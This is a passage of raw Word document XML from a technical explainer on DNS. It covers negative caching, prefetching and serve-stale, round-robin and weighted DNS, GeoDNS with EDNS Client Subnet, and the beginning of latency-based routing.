      </w:r>
    </w:p>
    <w:p w14:paraId="08E0B66A" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="734"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006F072B">
        <w:t>Mobile apps that maintain persistent connections never re-resolve.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FC2C5E5" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="734"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006F072B">
        <w:t>CDN nodes with pre-resolved connections keep using old IP.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E2EA8CF" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Actual propagation for TTL=60:</w:t>
      </w:r>
      <w:r w:rsidRPr="006F072B">
        <w:t> Most traffic moves in 1–2 minutes. Long tail takes 5–30 minutes. Full convergence may take hours for non-compliant clients.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F0F01C0" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006F072B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>5.3 Negative Caching — Caching "Does Not Exist"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DC2FE2A" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:t>When a query returns NXDOMAIN (non-existent domain):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C9D5BCF" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="735"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006F072B">
        <w:t>The authoritative server's SOA record includes a "minimum TTL" (the MINIMUM field).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BD80A23" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="735"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006F072B">
        <w:t>The resolver caches the NXDOMAIN result for this duration.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A09B6F4" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="735"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006F072B">
        <w:t>Subsequent queries for the same non-existent name return NXDOMAIN from cache without re-querying.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11BCB178" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Why this matters:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EF1019E" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="736"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006F072B">
        <w:t>Prevents amplification attacks (query storm for non-existent domains).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4ED7C6A4" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="736"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006F072B">
        <w:t>Reduces load on authoritative servers from typos and probing.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46EC5CEA" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="736"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006F072B">
        <w:t>But also means: if you create a new subdomain, clients that recently queried it (and got NXDOMAIN) won't see it until the negative cache expires.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74B566F4" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006F072B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>5.4 Prefetching and Serve-Stale</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E3B98B2" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Prefetching (resolver optimization):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F5DE0D1" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:t>When a popular record's TTL is about to expire:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F86B161" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="737"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006F072B">
        <w:t>Instead of waiting for the next client query to trigger a refresh (causing one client to wait for resolution):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D4FAF06" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="737"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006F072B">
        <w:t>The resolver proactively refreshes the record BEFORE TTL expires.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74FA82BF" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="737"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006F072B">
        <w:t>All clients continue receiving instant cached responses with no interruption.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4976C61C" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>How it works:</w:t>
      </w:r>
      <w:r w:rsidRPr="006F072B">
        <w:t> When a record has &lt; 10% of its TTL remaining AND it's been queried recently (popular), the resolver sends a background query to refresh. The old cached entry continues serving until the refresh completes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C9AE939" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Serve-stale (RFC 8767):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DF233BC" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:t>If the authoritative server is unreachable when a cached record expires:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FB768DF" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="738"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006F072B">
        <w:t>Instead of returning SERVFAIL to clients (DNS failure = complete service outage):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A3F07FB" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="738"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006F072B">
        <w:t>The resolver serves the expired (stale) cached record.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F220146" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="738"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006F072B">
        <w:t>Continues attempting to refresh in the background.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1697B326" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Why this is critical for reliability:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54C06EAD" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:t>Without serve-stale: authoritative DNS outage → immediate total failure for all clients whose cache has expired.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7562D3B0" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:t>With serve-stale: authoritative DNS outage → clients continue receiving (slightly stale but likely still correct) answers. The service remains reachable even though DNS infrastructure is impaired.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B5FF5E7" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Real-world impact:</w:t>
      </w:r>
      <w:r w:rsidRPr="006F072B">
        <w:t> Many major outages have been caused by authoritative DNS failures. Serve-stale prevents DNS infrastructure problems from cascading into service outages.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B699F92" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:pict w14:anchorId="4E71D983">
          <v:rect id="_x0000_i3481" style="width:0;height:3pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E1B793B" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006F072B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>6. DNS as a Load Balancing and Traffic Management Tool</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F06BA6D" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006F072B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>6.1 Round-Robin DNS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="402ADA50" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The simplest form of DNS load balancing:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47060C7F" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E1A5162" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:t>www.example.com.    60    IN    A    10.0.1.1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62B0EFFF" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:t>www.example.com.    60    IN    A    10.0.1.2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38F3E9D8" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:t>www.example.com.    60    IN    A    10.0.1.3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="005EE601" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:t>Multiple A records for the same name. The DNS server rotates the order in responses:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53AA625E" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="739"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006F072B">
        <w:t>Query 1 returns: [10.0.1.1, 10.0.1.2, 10.0.1.3]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A8C9E38" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="739"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006F072B">
        <w:t>Query 2 returns: [10.0.1.2, 10.0.1.3, 10.0.1.1]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F9EAC0E" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="739"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006F072B">
        <w:t>Query 3 returns: [10.0.1.3, 10.0.1.1, 10.0.1.2]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="553B432A" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:t>Clients typically connect to the first IP in the list → traffic distributes roughly evenly.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D8C974B" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Limitations:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75950DCE" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="740"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006F072B">
        <w:lastRenderedPageBreak/>
        <w:t>No health checking — if 10.0.1.2 is dead, DNS still returns it. Clients get errors.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="723F97D0" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="740"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006F072B">
        <w:t>No awareness of server load — an overloaded server gets the same traffic.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CAFE9B2" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="740"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006F072B">
        <w:t>Uneven distribution — caching means many clients get the same response (all go to same IP for the TTL duration).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53A51121" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="740"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006F072B">
        <w:t>No session affinity — consecutive queries may return different orderings.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E8EF30E" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006F072B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>6.2 Weighted DNS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D0F58A5" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60C895D2" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:t>www.example.com.    60    IN    A    10.0.1.1    ; weight 70%</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A287801" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:t>www.example.com.    60    IN    A    10.0.1.2    ; weight 20%</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D906241" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:t>www.example.com.    60    IN    A    10.0.1.3    ; weight 10%</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="371631AE" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:t>The authoritative server responds with different IPs based on configured weights:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="697CA06C" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="741"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006F072B">
        <w:t>70% of responses have 10.0.1.1 first (or only).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D23429F" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="741"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006F072B">
        <w:t>20% have 10.0.1.2 first.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CBFC378" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="741"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006F072B">
        <w:t>10% have 10.0.1.3 first.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63BAE095" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Use case:</w:t>
      </w:r>
      <w:r w:rsidRPr="006F072B">
        <w:t> Canary deployments. Route 5% of DNS traffic to new server version, monitor, then increase.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13469610" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006F072B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>6.3 GeoDNS (Geographic Routing)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15F7A6CD" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>How it works internally:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58C6C8C8" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="742"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006F072B">
        <w:t>Client queries www.example.com → query arrives at the authoritative nameserver.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D119757" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="742"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006F072B">
        <w:t>The nameserver examines the </w:t>
      </w:r>
      <w:r w:rsidRPr="006F072B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>source IP</w:t>
      </w:r>
      <w:r w:rsidRPr="006F072B">
        <w:t> of the query (the recursive resolver's IP) or the </w:t>
      </w:r>
      <w:r w:rsidRPr="006F072B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>EDNS Client Subnet</w:t>
      </w:r>
      <w:r w:rsidRPr="006F072B">
        <w:t> (ECS) extension (which carries the client's actual subnet).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06E7DA06" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="742"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006F072B">
        <w:t>The nameserver looks up the geographic location of this IP (using a GeoIP database like MaxMind).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07A3BD7F" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="742"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006F072B">
        <w:t>Based on geography, returns the IP of the nearest data center:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FA97626" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="742"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006F072B">
        <w:t>Client in Europe → return EU datacenter IP.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13264E73" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="742"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006F072B">
        <w:t>Client in Asia → return Asia datacenter IP.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F9C3F8F" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="742"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006F072B">
        <w:t>Client in US → return US datacenter IP.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="683F2A1D" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>EDNS Client Subnet (ECS) — why it's needed:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A3F7A38" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:t>Without ECS: a client in Tokyo using Google's resolver (8.8.8.8, located in multiple places) sends the query from a Google IP — which might geolocate to the US. The authoritative server thinks the client is in the US → returns US datacenter IP → user in Tokyo gets horrible latency.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50408E75" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:t>With ECS: the recursive resolver includes the client's subnet prefix (e.g., 103.4.200.0/24) in the query. The authoritative server geolocates the ACTUAL client → returns the correct regional IP.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57A60FB8" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>ECS privacy tradeoff:</w:t>
      </w:r>
      <w:r w:rsidRPr="006F072B">
        <w:t> Exposes partial client IP to the authoritative server. Privacy-focused resolvers (Cloudflare 1.1.1.1) either don't send ECS or send minimal info.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18B5F14B" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006F072B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>6.4 Latency-Based Routing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16F68FDB" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>More sophisticated than GeoDNS:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BF99496" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:t>Instead of geographic proximity (which may not correlate with network latency), measure actual network latency:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00C5F1AC" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="743"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006F072B">
        <w:t>DNS provider maintains probes worldwide.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44D50948" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="743"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006F072B">
